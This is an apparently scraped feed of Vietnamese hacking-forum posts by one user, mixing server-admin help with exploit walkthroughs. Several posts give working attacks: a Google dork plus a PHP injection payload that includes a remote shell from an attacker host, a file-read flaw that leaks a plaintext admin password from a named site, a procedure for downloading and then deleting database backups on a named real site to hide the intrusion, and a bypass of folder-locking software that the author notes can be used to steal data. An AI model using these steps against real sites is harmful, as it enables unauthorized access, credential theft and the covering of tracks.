<![CDATA[Messages posted by "hack2prison"]]> /hvaonline/posts/listByUser/57658.html JForum - http://www.jforum.net Hỏi về cách upload file trên CentOS minimal

ComandC wrote:
Hiện tại mình có dùng 1 máy ảo là centOS nhưng ở bản Minimal. Cho mình hỏi làm sao mà upload file lên server này được ạ? 
bật dịch vụ sshd chạy cái này: Bitvise SSH Client http://www.bitvise.com/download-area]]>
/hvaonline/posts/preList/44478/275196.html#275196 /hvaonline/posts/preList/44478/275196.html#275196 GMT
Tạo một sever hosting đa năng

thanh_1313 wrote:
Cho mình hỏi có cách nào tạo một hosting Linux (ubuntu hay centos...) có thể chạy được tất tần tật các source web php, asp... Mình có cài qua zpanel, cpanel, kloxo, ... nhưng chúng không có chạy được mấy loại web hay chạy trên windows. Mình đang muốn tiết kiệm chi phí, bỏ hết tất cả lên 1 con linux thui. Các bác có gợi ý nào cho mình không? :( 
Được nhé bạn: http://www.mono-project.com/Main_Page]]>
/hvaonline/posts/preList/44604/275194.html#275194 /hvaonline/posts/preList/44604/275194.html#275194 GMT
Nhờ vả: Tính toán resource cho VPS

Ikut3 wrote:
Trước khi sizing 1 cái gì từ thiết bị phần cứng, cho đến các tunning chỉnh sửa thì những thông tin như thế này bắt buộc phải có - Tổng lượng User connect / tính trung bình - Lượng Concurrent Request thật đến dịch vụ tại mọi thời điểm - Số lượng User mà bạn nhắm sẽ đáp ứng cho thời điểm hiện tại và tương lai Trong các thông số mà bạn đưa ở trên kia thì không có cái thông tin gì về lượng người bạn sẽ đáp ứng với cấu hình phần cứng hiện tại cả. Theo mình, trước khi tunning hay quyết định gia tăng tài nguyên hệ thống nhằm mở rộng tính scalability 1 dịch vụ / 1 ứng dụng phục vụ người dùng. Mình phải thấy được rõ những thông số thật mà hệ thống hiện tại đang phải chịu tải, kiểm tra từ các thành phần Application - Operating System - Network - Hardware xem có bị bottleneck ở đâu không rồi mới bắt đầu tiến hành nâng cấp. Tất nhiên để làm được cái đoạn in nghiêng trên thì chỉ có 1 cách giúp bạn đó là theo dõi. Những công cụ monitor như Dtracetool , Sysstat (có sẵn) v.v... đều có thể làm rất tốt việc này.  
Thanks Tổng số visitors tại cùng thời điểm trung bình khoảng 150 người, mỗi visitor mở khoảng 5 tab đồng thời (theo thống kê của google analytics). Số lượng visitors ổn đình, ít tăng giảm đột biến. Mình chỉ tính cho hiện tại, còn sau này nếu có tăng thì nâng cấp sau.]]>
/hvaonline/posts/preList/44630/275193.html#275193 /hvaonline/posts/preList/44630/275193.html#275193 GMT
Nhờ vả: Tính toán resource cho VPS Code:
total       used       free     shared    buffers     cached
Mem:			2001        247       1754          0         29         84
-/+ buffers/cache:        133       1867
Swap:          666          0        666
top
Đây là task của Server 2 (chứa MySQL database) free -m Code:
total       used       free     shared    buffers     cached
Mem:			2010       1399        610          0         10       1248
-/+ buffers/cache:        141       1869
Swap:         2099          0       2099
top
Nhờ các bạn tư vấn tăng/giảm RAM và CPU của mỗi Server: ISP họ bán RAM theo block là 512 MB, CPU theo block là core. Cảm ơn]]>
/hvaonline/posts/preList/44630/275187.html#275187 /hvaonline/posts/preList/44630/275187.html#275187 GMT
PHCDownload 1.1.0 by H2P http://phpcredo.com - Menthod: Remote File Inclusion. - Infect: search, addfile và add comment function. - Version: v1.1.0 and older - Reported: H2P Khai thác: - Google dork: Powered by PHCDownload 1.1.0 - http://[insecure_site]/[path]/search.php Search Words: ">< <?php include("[http://attacker_site]/[shell_file]"); ?> Submit và xem điều kỳ diệu. Note: Tương tự đối với chức năng add file và post comment Bạn có thể chạy mã PHP: http://[insecure_site]/[path]/search.php?string=">< <?php PHP_CODE_HERE ?> Cái này hơi lạ, giống Remote File Inclusion nhưng còn có thể chèn và chạy trực tiếp mã PHP. ]]> /hvaonline/posts/preList/27859/170872.html#170872 /hvaonline/posts/preList/27859/170872.html#170872 GMT Re: Bị nhiễm virus j không biết? /hvaonline/posts/preList/27354/167313.html#167313 /hvaonline/posts/preList/27354/167313.html#167313 GMT BKAV đích thực là mã độc? Tôi mới download BKAV bản mới nhất (16-1-2009) Và nhờ http://www.virustotal.com check thử. Nói thêm tí: virustotal.com sử dụng 38 phần mềm diệt virus hàng đầu thế giới BKAV không nằm trong 38 mới đauscau: http://www.virustotal.com/sobre.html Điên thế nhỉ, một phần mềm diệt virus hay thế mà không sử dụng Kết quả: http://www.virustotal.com/analisis/5778ad760a1472ed1be610e299f845a9 a-squared 4.0.0.73 2009.01.16 PHISH.FraudTool.BachKhoa.A!IK eSafe 7.0.17.0 2009.01.15 Suspicious File Ikarus T3.1.1.45.0 2009.01.16 PHISH.FraudTool.BachKhoa.A McAfee 5496 2009.01.15 New malware.jm McAfee+Artemis 5496 2009.01.15 New malware.jm SecureWeb-Gateway 6.7.6 2009.01.16 Win32.Malware.gen!84 (suspicious) Sunbelt 3.2.1835.2 2009.01.16 VIPRE.Suspicious Có thể là do nhận diện nhầm, nhưng chả hiểu sao càng coi cái kết quả test này lại càng thấy đúng. FraudTool : Cái này chính xác!. Bán giá đắt, cam kết nhiều nhưng chẳng đáp ứng được bao nhiêu mà kiện nó cũng không được -->Fraud Malware , Suspicious File : Cũng thấy đúng, thu thập thông tin của người sử dụng, nếu không sao anh ấy biết có bao nhiêu người đang sử dụng anh ấy. Ikarus, a-squared chỉ đích danh PHISH.FraudTool.BachKhoa.A và tớ tin vào kết luận đó. Chắc 2 anh này đã mổ xẻ rất kỹ nên chỉ đích danh như vậy. Sắp tới chắc anh Q sẽ liệt tất cả 38 chương trình diệt virus trên vào danh sách phần mềm diệt WINDOWS ) Còn ý kiến của bạn thế nào?  ]]> /hvaonline/posts/preList/27371/167268.html#167268 /hvaonline/posts/preList/27371/167268.html#167268 GMT Re: Máy tính của tôi dính virus autorun.inf khủng khiếp.

tuangiang08 wrote:
Tôi có dùng Bkav và thấy Bkav có tool rất hay bạn có thể down ở đây: http://bkav.com.vn/home/download/bkavhometool.exe bạn lưu trên máy tính của bạn sau đó chạy file này lên bấm vào Ghi log... sau đó chọn đường dẫn lưu lại trên máy tính của bạn file có tên là Kiemtra2009.bkc, bạn hãy gửi file này về cho tôi qua email tuangiang08@gmail.com tôi sẽ kiểm tra và xử lý cho bạn. Chúc bạn thành công. :)  
Này thì BKAV: http://www.virustotal.com/analisis/5778ad760a1472ed1be610e299f845a9]]>
/hvaonline/posts/preList/27213/167267.html#167267 /hvaonline/posts/preList/27213/167267.html#167267 GMT
Re: File Autorun.inf và các vấn đề liên quan và cách phòng chống virus http://warezshare.com/anti-virusspy/516-usb-drive-antivirus.html]]> /hvaonline/posts/preList/27008/165118.html#165118 /hvaonline/posts/preList/27008/165118.html#165118 GMT Re: Virus lây qua usb. http://warezshare.com/anti-virusspy/516-usb-drive-antivirus.html]]> /hvaonline/posts/preList/7051/165117.html#165117 /hvaonline/posts/preList/7051/165117.html#165117 GMT Re: trang FBI.gov.vn có lỗi rất thú vị !!! /hvaonline/posts/preList/7239/98566.html#98566 /hvaonline/posts/preList/7239/98566.html#98566 GMT Re: foderl lock /hvaonline/posts/preList/15527/92762.html#92762 /hvaonline/posts/preList/15527/92762.html#92762 GMT Re: Qua mặt Folder Access Hì hì Nhưng câu ở trên là không tìm thấy File đó thì lấy đâu ra để mà mở nó bằng Notepad hả anh Zai  You cài folder access 2 chưa à? Cài xong và lock một folder thì mới có file đó :D ]]> /hvaonline/posts/preList/15337/92365.html#92365 /hvaonline/posts/preList/15337/92365.html#92365 GMT Jeebles Directory: LFI Get Admin trong nháy mắt http://google.com gõ từ khóa: Powered by Jeebles Directory Kết quả cũng kha khá nhỉ :D ta lấy thằng thứ 2 thử nhé: http://www.esco.net/highres Công thức khai thác: http://[site]/[path]/download.php?settings2.inc.php Như vậy với ví dụ trên sẽ là: http://www.esco.net/highres/download.php?settings2.inc.php Một file đẹp đẹp mời ta download. Mở ra thấy: Code:
...
$LOGIN_INFORMATION = array(
  'admin' => '3quipm3nt01'
...
Bạn có thể download các file khác, muốn rõ thông tin download script này về nghiên cứu he COMPLETED - Discovered by H2P]]>
/hvaonline/posts/preList/15479/92342.html#92342 /hvaonline/posts/preList/15479/92342.html#92342 GMT
Re: Qua mặt Folder Access /hvaonline/posts/preList/15337/91987.html#91987 /hvaonline/posts/preList/15337/91987.html#91987 GMT Re: Làm ơn chỉ dùm cách diệt virus trong win /hvaonline/posts/preList/15288/91428.html#91428 /hvaonline/posts/preList/15288/91428.html#91428 GMT Re: trời bảo mật quá hóa hại mong các anh giúp đỡ /hvaonline/posts/list/0/15337.html]]> /hvaonline/posts/preList/7134/91246.html#91246 /hvaonline/posts/preList/7134/91246.html#91246 GMT Qua mặt Folder Access /hvaonline/posts/list/7134.html, tôi nghĩ nhiều người cũng bị tình trạng này nên mở topic mới để sau dễ sử dụng. Dĩ nhiên bạn cũng có thể dùng để đánh cắp dữ liệu, nhưng hậu quả xin đừng đổ cho tôi :mrgreen: . Nếu thấy "hay" thì mod PIN lên cái nhé. Tớ đã test thành công với bản FREE: Muốn bắt cọp phải vào hang cọp, download về cái đã http://www.folderaccess.com Cài đặt nó để thử nghiệm. Tạo một folder ‘test’ trong D và copy một file text bất kỳ vào đó để thử nghiệm nhé (Vì sao phải copy một file vào đó? vì nếu folder empty sau này làm sao bạn kiểm tra được sự toàn vẹn thông tin). Ngay khi lock folder ‘test’, bạn có thể copy/delete/rename nó. Khởi động lại và thử double click vào nó, chuyện gì xảy ra? Right click chọn Open hay Explorer bạn sẽ được chuyển vào Control Panel. Thử double click vào xem, nó đòi password. Giả sử rằng ta ngồi nhờ máy và bị chủ nhân nó lock folder ‘test’ trước đó hoặc ta là chủ nhân nhưng quên mìa nó password. Bây giờ ta thử copy/delete/rename thử coi, nó sẽ báo lỗi: Code:
Cannot delete test.{21EC2020-3AEA-1069-A2DD-08002B30309D}: It is being used by another person or program.
Close any program that might be using the file and try again.
Mở nó ra thì nó đòi password. Không lẽ bó tay? Có rất nhiều bạn đưa ra phương án khác nhau nhưng phần ý kiến là copy sang máy khác, kill process (hình như không được), nhưng như đã nói ở trên, làm sao copy được trong windows đây? hay là copy trong DOS? Tôi đã đọc tất cả các ý kiến được thảo luận trong topic của bạn đó nhưng có vẻ không thể thực hiện (tôi chưa thử). Cách 1. Vào NC DOS bằng Hiren Boot chẳng nhìn thấy folder 'test' đâu cả. Chỉ thấy file ‘test~1. {21’. Khè khè trong windows nhìn thấy thư mục ‘test’ chuyển thành biểu tượng của chương trình Folder Access nhưng thực chất nó là một file, nhớ lại khi delete/copy/rename nó báo cannot delete/copy/rename test.{21EC2020-3AEA-1069-A2DD-08002B30309D} vào DOS nó tự đổi tên theo quy tắc 8.3. Rename nó thành ‘test’ và khởi động lại Windows nào. Kiểm tra lại sự toàn vẹn thông tin mà tôi nói ở trên nhé. :mrgreen: Nếu bạn không có Hiren Boot hoặc không biết sử dụng thì dùng cách 2. Cách 2. Copy ngay trong windows với một thủ thuật nhỏ. Mở file C:\WINDOWS\system32\mslck.dat thấy nội dung: 'Test D:\ 1' bạn sửa số 1 thành 0. Save và khởi động lại. Bây giờ bạn thử copy vào USB nào. Ngạc nhiên chưa? Tuy nhiên folder gốc và folder vừa copy vào USB vẫn chưa thể mở được. Nó vẫn đòi pass một cách đáng ghét. Đưa sang máy khác, vẫn chưa đọc được đâu. Bạn phải cài Folder Access vào. Đừng vội set password cho chương trình nhé. Click thử vào folder 'test' vừa copy trong USB coi. Nó đã được unlock. Với bản Purchase cũng tương tự, bạn có thể dùng serial lúc cài đặt chương trình như là một password "chống cháy". Tớ nghĩ có thể dùng ngay Windows Comander để rename file đó nhưng chưa test. Bản chất vấn đề đã được giải quyết, xin vui lòng test thử các cách khác có khi đơn giản hơn. H2P]]>
/hvaonline/posts/preList/15337/91245.html#91245 /hvaonline/posts/preList/15337/91245.html#91245 GMT
Re: trời bảo mật quá hóa hại mong các anh giúp đỡ + default password (hack2prison): lQ nghĩ là nếu ctr FA2 này đơn giản (ở chỗ nó có thể vô hiệu hoá dễ dàng) thì nó sẽ ko có default pasword. Nhưng đây cũng là 1 cách có thể áp dụng được với các ctr khác.   Default password chính là cái serial number lúc bạn cài. Xem file serial trong thư mục cài đặt nhé. Tớ đã thực hiện thành công với vài chương trình lock folder. Không biết chương trình bạn dùng có áp dụng cách này được không]]> /hvaonline/posts/preList/7134/91227.html#91227 /hvaonline/posts/preList/7134/91227.html#91227 GMT Re: trời bảo mật quá hóa hại mong các anh giúp đỡ

lQ wrote:

H3in3k3n wrote:
Format hết rồi dùng Soft khôi phục dữ liệu chứ sao .Hixx đúng là bảo mật quá hóa hại . 
Mẹ ôi, mới nghe cách này lần đầu luôn. :-o)  
Không rõ chỗ này, nhưng với GetDataBack có thể làm được việc này đó bạn. Mình format 2 lần vẫn lấy lại được trừ các file dung lượng lớn (phim và file .GHO)]]>
/hvaonline/posts/preList/7134/89849.html#89849 /hvaonline/posts/preList/7134/89849.html#89849 GMT
Re: trời bảo mật quá hóa hại mong các anh giúp đỡ /hvaonline/posts/preList/7134/89848.html#89848 /hvaonline/posts/preList/7134/89848.html#89848 GMT Re: BigDump File Upload Exploit /hvaonline/posts/preList/15074/89844.html#89844 /hvaonline/posts/preList/15074/89844.html#89844 GMT phpCoupon Lỗi củ chuối /hvaonline/posts/preList/15044/89607.html#89607 /hvaonline/posts/preList/15044/89607.html#89607 GMT Re: Affiliate Network Pro, mới tinh http://[site]/[path]/admin/backupstart.php Upload len shell file dạng .php.sql sẽ run được trên nhiều server: http://[site]/[path]/admin/dump/file.php.sql - Added by navaro: http://[site]/[path]/admin/downloadbackup.php?fl=[filename] -->Local File Inclusion]]> /hvaonline/posts/preList/15042/89603.html#89603 /hvaonline/posts/preList/15042/89603.html#89603 GMT Affiliate Network Pro, mới tinh http://www.securityfocus.com/archive/1/481206 Lâu rồi, chăm sóc vợ sắp đẻ nên H2P không tham gia forum. Hôm nay ngồi ngứa nghề tìm ra cái bug stupid nhưng khá nguy hiểm. Cũng chẳng có gì cao siêu nên H2P mới gọi là stupid bug, nhưng vấn đề là khai thác toàn diện. Lòng vòng nhiều quá, ta vào cuộc: google keyword: allinurl: "index.php?Act=Merchants" Kết quả kha khá nhỉ? Thử thay trang tìm kiếm khác và vài từ khóa khác tự nghĩ ra nhé, hỏi là tớ chửi cho đấy. Thử thằng đầu tiên nhé: http://www.eduaffiliates.com/index.php?Act=Merchants 1. http://www.eduaffiliates.com/admin/dump sẽ thấy backup-23-08-2007.sql cái gì đây, lol file backup của nó đấy. Trong trường hợp thư mục được bảo vệ bằng 1 file index, .htaccess, nó chưa backup hoặc file backup đã quá cũ (ngày tháng năm backup nằm trong tên file ấy) mà mình muốn lấy file backup mới nhất thì sao. 2. Tạo file backup - http://www.eduaffiliates.com/admin/backupstart.php click vào nút Backup a. Quay lại: http://www.eduaffiliates.com/admin/dump sẽ thấy file backup-14-09-2007.sql là file ta vừa tạo ra (ngày 14-09-2007) get it. b. Trong trường hợp thư mục được bảo vệ bằng 1 file index, bạn không thấy được thì làm sao download. Đơn giản: http://www.eduaffiliates.com/admin/dump/backup-dd-mm-yyyy.sql thay ngày tháng năm theo giờ sever nhé. c. Trong trường hợp thư mục được bảo vệ bằng 1 file .htaccess bạn sẽ nhận lỗi Forbiden, cũng đơn giản thôi http://www.eduaffiliates.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql 3. Xóa dấu vết Đây là bước quan trọng để admin không biết bị đột nhập: http://www.eduaffiliates.com/admin/deletebackup.php?fl=backup-dd-mm-yyyy.sql Ghi chú: Trang eduaffiliates.com đã die, tìm trang khác để thực hành. Một vài trang đã fix, Còn khá nhiều trang dính đấy. COMPLETED - H2P]]> /hvaonline/posts/preList/15042/89597.html#89597 /hvaonline/posts/preList/15042/89597.html#89597 GMT Re: Cẩn thận "virus" Yahoo mới: VnGuide /hvaonline/posts/preList/11725/68044.html#68044 /hvaonline/posts/preList/11725/68044.html#68044 GMT Re: Sử dụng HideIP và Proxy như thế nào? http://sockstoday.com sock ngon nhà em đấy :lol:) ]]> /hvaonline/posts/preList/9122/67672.html#67672 /hvaonline/posts/preList/9122/67672.html#67672 GMT Re: Hỏi về chuẩn đánh giá tính security cho các sản phẩm phần mềm? /hvaonline/posts/preList/11145/67671.html#67671 /hvaonline/posts/preList/11145/67671.html#67671 GMT Re: how to access a locked folder? /hvaonline/posts/preList/9532/67670.html#67670 /hvaonline/posts/preList/9532/67670.html#67670 GMT Re: 0DAY RFI in phpBB = 2.0.22 /hvaonline/posts/preList/11564/67669.html#67669 /hvaonline/posts/preList/11564/67669.html#67669 GMT